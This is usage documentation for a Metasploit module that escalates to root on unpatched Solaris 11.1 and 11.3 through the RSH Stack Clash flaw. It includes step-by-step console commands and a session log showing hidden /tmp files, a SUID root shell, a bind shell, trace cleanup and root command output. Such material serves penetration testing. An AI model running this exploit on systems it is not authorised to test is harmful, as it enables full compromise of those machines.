## Description

  This module exploits a vulnerability in RSH on unpatched Solaris
  systems which allows users to gain root privileges.

  The stack guard page on unpatched Solaris systems is of
  insufficient size to prevent collisions between the stack
  and heap memory, aka Stack Clash.

  This module uploads and executes Qualys' Solaris_rsh.c exploit,
  which exploits a vulnerability in RSH to bypass the stack guard
  page to write to the stack and create a SUID root shell.

  This module has offsets for Solaris versions 11.1 (x86) and
  Solaris 11.3 (x86).

  Exploitation will usually complete within a few minutes using
  the default number of worker threads (10). Occasionally,
  exploitation will fail. If the target system is vulnerable,
  usually re-running the exploit will be successful.


## Vulnerable Application

  This module has been tested successfully on:

  * Solaris 11.1 (x86)
  * Solaris 11.3 (x86)


## Verification Steps

  1. Start `msfconsole`
  2. Get a session
  3. Do: `use exploit/solaris/local/rsh_stack_clash_priv_esc`
  4. Do: `set SESSION [SESSION]`
  5. Do: `run`
  6. You should get a new *root* session


## Options

  **SESSION**

  Which session to use, which can be viewed with `sessions`.

  **RSH_PATH**

  Path to rsh executable. (default: `/usr/bin/rsh`)

  **WORKERS**

  Number of workers. (default: `10`)


## Scenarios

### Solaris 11.3 (x86)

  ```
  msf5 > use exploit/solaris/local/rsh_stack_clash_priv_esc
  msf5 exploit(solaris/local/rsh_stack_clash_priv_esc) > set session 1
  session => 1
  msf5 exploit(solaris/local/rsh_stack_clash_priv_esc) > set rhost 172.16.191.221
  rhost => 172.16.191.221
  msf5 exploit(solaris/local/rsh_stack_clash_priv_esc) > run

  [!] SESSION may not be compatible with this module.
  [*] Using target: Solaris 11.3
  [*] Writing '/tmp/.2yZgv2XkEj/.KJqSwhpguh.c' (10297 bytes) ...
  [*] Symlinking /tmp/.2yZgv2XkEj/.KJqSwhpguh to /tmp/.2yZgv2XkEj/ROOT
  [*] Creating suid root shell. This may take a while...
  [*] Completed in 324.21s
  [+] suid root shell created: /tmp/.2yZgv2XkEj/ROOT
  [*] Writing '/tmp/.2yZgv2XkEj/.bWjzWVllCB' (109 bytes) ...
  [*] Executing payload...
  [*] Started bind TCP handler against 172.16.191.221:4444
  [+] Deleted /tmp/.2yZgv2XkEj/.KJqSwhpguh.c
  [+] Deleted /tmp/.2yZgv2XkEj/.KJqSwhpguh
  [!] Tried to delete /tmp/.2yZgv2XkEj/ROOT, unknown result
  [+] Deleted /tmp/.2yZgv2XkEj/.bWjzWVllCB
  [+] Deleted /tmp/.2yZgv2XkEj

  id
  uid=0(root) gid=0(root) groups=10(staff)
  uname -a
  SunOS solaris 5.11 11.3 i86pc i386 i86pc
  cat /etc/release
                               Oracle Solaris 11.3 X86
    Copyright (c) 1983, 2015, Oracle and/or its affiliates.  All rights reserved.
                              Assembled 06 October 2015

  ```

